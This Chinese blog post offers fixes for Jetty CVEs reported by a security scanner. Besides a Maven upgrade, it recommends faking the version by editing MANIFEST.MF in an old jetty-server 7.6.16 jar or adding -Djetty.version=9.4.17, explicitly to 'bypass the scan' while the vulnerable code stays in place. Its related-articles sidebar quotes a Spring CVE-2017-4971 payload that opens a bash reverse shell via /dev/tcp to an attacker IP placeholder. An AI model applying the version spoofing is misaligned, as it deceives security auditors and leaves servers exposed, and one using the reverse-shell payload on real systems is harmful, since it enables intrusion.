Eclipse Jetty CVE-2017-7658、CVE-2018-12538、CVE-2017-7656、CVE-2018-12545、CVE-2017-9735、CVE-2019-10241

最新推荐文章于 2024-07-26 09:50:12 发布
最新推荐文章于 2024-07-26 09:50:12 发布
阅读量5.1k 收藏 8
点赞数 6
文章标签: 服务器 jetty 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaomengxin521/article/details/120707654
版权

最近服务器扫描出现jetty安全漏洞,记录下解决方案

在这里插入图片描述

解决方案

有两个解决方式,一种是升级jetty,一种更改版本

升级jetty,Maven pom依赖修改版本

<dependencyManagement>
	<dependencies>
		<dependency>
			<groupId>org.eclipse.jetty</groupId>
			<artifactId>jetty-server</artifactId>
			<version>9.4.17.v20180605</version>
	   </dependency>
   </dependencies>
</dependencyManagement>

更改版本(绕过扫描)

更改版本分两种情况

jar包方式更改
找到应该服务的jar包 (如:jetty-server-7.6.16.v20140903.jar)
用解压工具打开
进入到META-INF文件夹下
编辑 MANIFEST.MF
把这两行版本信息替换掉
	Implementation-Version: 9.4.17
	Bundle-Version: 9.4.17
启动脚本方式更改
启动脚本添加 -Djetty.version=9.4.17
奔跑的蜗牛...
关注
  • 6
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Eclipse Jetty Server 安全漏洞(CVE-2017-7658)
暴暴风的博客
03-19 1万+
@[Toc]( Eclipse Jetty Server 安全漏洞(CVE-2017-7658) ) 1、 问题: 最近给一个客户部署项目,但是客户的安全稽核有点变态。 居然说 Eclipse Jetty Server 高危漏洞! 直接把修复建议都给出了,那好参照建议链接: 2、分析 然后回到工程项目,看了下我们的项目的jetty 版本是 9.4.10.v20180503. 确认是撞上了客户的安全稽核了。 于是,查询项目哪个地方引用了 Eclipse Jetty Server。 在一个 job-cen
漏洞复现—Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273
weixin_45556536的博客
12-24 1089
CVE-2017-4971 // 注意反弹的端口和IP修改,反弹语句需要url编码 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub
Jetty服务器跨站脚本和目录遍历漏洞
weixin_33881041的博客
06-27 5039
2019独角兽企业重金招聘Python工程师标准>>> ...
Jenkins 命令执行 -- jetty 敏感信息泄露 --(CVE-2021-2816)&&(CVE-2017-1000353)&&(CVE-2018-1000861)
weixin_74985952的博客
09-25 799
对于
Jetty 安全漏洞分析
热门推荐
xyp632的博客
05-22 2万+
Jetty 安全漏洞分析1. 安全问题分析2. 升级验证3. Jetty版本不准确问题分析4. Jetty版本不能准确的临时解决方案5. 应用例子案例 1:metabase案例 2:jenkins 记录日期:2021/5/21 1. 安全问题分析 在做服务器安全扫描时,有时会报出 jetty 的漏洞。 查看漏洞详情可知,低版本的 jetty 包含漏洞,升级 jetty 到新版本就可以修复这些漏洞。 漏洞 官方问题连接 修复版本 Eclipse Jetty HTTP请求走私漏洞(CVE-
GeoServer 2.11.1升级解决Eclipse Jetty 的一系列安全漏洞问题
diaya的专栏
02-06 2027
下载 Geoserver2.32.4,先装了JDK17,再装了GeoServer2.23.4。网址访问一切正常,建了工作空间,在存储仓库里选 shapefile新建时,点“浏览”,竟无法弹出选文件的窗口,查看调用显示下错。接到安全评估报告,发现上面一堆关于Jetty的安全问题,后得知,是GeoServer2.11.1中用的jetty版本太低导致。Eclipse Jetty HTTP请求走私漏洞(CVE-2017-7658)2、先卸载原有的geoserver2.11.1,再卸载其配套的jre 8。
利用Docker容器的不安全部署获取宿主机权限
weixin_34253539的博客
12-24 486
前言滥用容器( container)及逃逸的方法有多种,本文将讨论最基本的一种,即滥用docker socket来逃逸容器并在宿主机上以root身份执行代码。实验环境设置由于我们将使用容器,因此你必须安装docker。创建网络首先,我们在创建容器的地方创建一个docker网络:docker network create pwnage复制代码启动易受攻击的容器在本示例中,我将使用受SambaCry漏...
jetty-util-6.1.25.jar
01-10
jetty-util-6.1.25.jarjetty-util-6.1.25.jarjetty-util-6.1.25.jar
cckuailong#vulbase#Eclipse Jetty 拒绝服务 (CVE-2020-27223)1
07-25
Eclipse Jetty 拒绝服务 (CVE-2020-27223)当Jetty处理包含带有大量质量因子参数(Accept请求头中的q值)的Accept请求头
apache-cxf-2.7.6所有jar包
07-23
5. **cxf-rt-transports-http-jetty**: 如果你选择使用Jetty作为嵌入式服务器,这个模块会提供必要的支持。 6. **cxf-rt-bindings-soap** 和 **cxf-rt-bindings-xml**: 这些库处理SOAP和XML绑定,解析和生成消息。 ...
eclipse jetty插件
05-16
run-jetty-run是一个新的jetty eclipse插件通过该插件可以直接在Eclipse环境中启动、停止 Jetty ,同时进行在线调试而无需重启服务。 http://run-jetty-run.googlecode.com/svn/trunk/updatesite 由于谷歌退出中国,导致在线安装失败,只能离线安装,特此提供。
eclipse jetty插件安装(离线版)
08-01
Eclipse Jetty插件是开发Java Web应用时非常实用的工具,它允许开发者在Eclipse集成开发环境中直接启动和测试Jetty服务器,而无需通过命令行或其他方式。本篇文章将详细讲解如何离线安装Eclipse Jetty插件,并介绍其...
Eclipse Jetty server漏洞解决
qq_42222680的博客
02-10 7436
Eclipse Jetty 服务器伪路径请求绕过漏洞(Linux)
HTTP 请求走私漏洞(HTTP Request Smuggling)
weixin_42451330的博客
07-18 4283
HTTP请求走私漏洞(HTTP Request Smuggling)是一种安全漏洞,利用了HTTP协议中请求和响应的解析和处理方式的不一致性。攻击者通过构造特定的恶意请求,以欺骗服务器和代理服务器,从而绕过安全机制,执行未经授权的操作。HTTP请求走私漏洞通常涉及两个或多个HTTP请求的组合,攻击者可以利用HTTP报文中的头部或其他元数据来混淆和欺骗服务器或代理服务器的解析逻辑。
东方联盟:Linux 系统的 15 大漏洞
w3cschools的博客
08-24 1534
近 1400 万个基于 Linux 的系统直接暴露在互联网上,使它们成为一系列现实世界攻击的有利目标,这些攻击可能会导致部署恶意 Web 外壳、硬币挖掘器、勒索软件和其他木马。 这是根据知名网络安全组织东方联盟研究人员发布的对 Linux 威胁格局的深入研究,根据从蜜罐、传感器和匿名遥测。 该公司检测到近 1500 万个针对基于 Linux 的云环境的恶意软件事件,发现硬币矿工和勒索软件占所有恶意软件的 54%,其中 web shell 占 29%。 此外,通过剖析同一时期 100,000 个独特
web服务器/中间件漏洞系列6:jetty漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-02 1万+
JETTY简介: Jetty作为Eclipse基金会的一部分,是一个纯粹的基于Java的网页服务器和Java Servlet容器,其支持最新的Java Servlet API,同时支持WebSocket,SPDY,HTTP/2协议。 一、CVE-2021-28164 [34429] 敏感信息泄露 1、漏洞简介: 在Jetty9.4.37版本中,为了符合RFC3986中的规范,选择性地支持可能有歧义解释的URI,默认模式允许URL编码,简单看下RFC3986(替代RFC2396)的规定 其大致意思是:.和.
HTTP请求走私漏洞
Atkx's Blog
04-11 4948
这里写自定义目录标题 [RoarCTF 2019]Easy Calc calc.php代码 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
Hadoop生态漏洞修复记录
manweizhizhuxia的博客
03-28 2992
Hadoop、zookeeper、hive漏洞修复
本地部署VMware ESXi服务实现无公网IP远程访问管理服务器
最新发布
weixin_44976692的博客
07-26 1780
在虚拟化技术日益成熟的今天,VMware ESXi以其卓越的性能和稳定性,成为了众多企业构建虚拟化环境的首选。然而,随着远程办公和跨地域管理的需求增加,如何高效地远程访问和管理部署在本地数据中心的ESXi服务器,成为了企业IT部门面临的重要挑战。传统的远程访问方式往往受限于网络配置复杂、IP地址固定以及安全性能不足等问题,难以满足现代企业对于灵活、安全、高效的远程管理需求。为了解决这一难题,我们可以借助Cpolar内网穿透技术,将本地ESXi服务器的访问能力扩展到公网,实现随时随地的远程访问和管理。
Eclipse Jetty 安全漏洞(CVE-2022-2048)
06-09
Eclipse Jetty 是一种开源的基于 Java 的 Web 服务器和 Servlet 容器。CVE-2022-2048 是指 Jetty 存在一种安全漏洞,可能允许攻击者利用恶意请求绕过访问控制,从而访问未授权的资源。 具体来说,这个漏洞涉及到 Jetty 的 HTTP/2 实现。攻击者可以通过发送带有特定标头的 HTTP/2 请求来绕过 Jetty 的访问控制。这可能会导致攻击者访问未授权的文件或目录,或者执行未经授权的操作。 建议使用 Jetty 的用户尽快更新到最新版本,以减轻 CVE-2022-2048 漏洞的影响。此外,为了更好地保护您的服务器,您还可以考虑使用 Web 应用程序防火墙 (WAF) 或其他安全措施来防止攻击者利用此漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值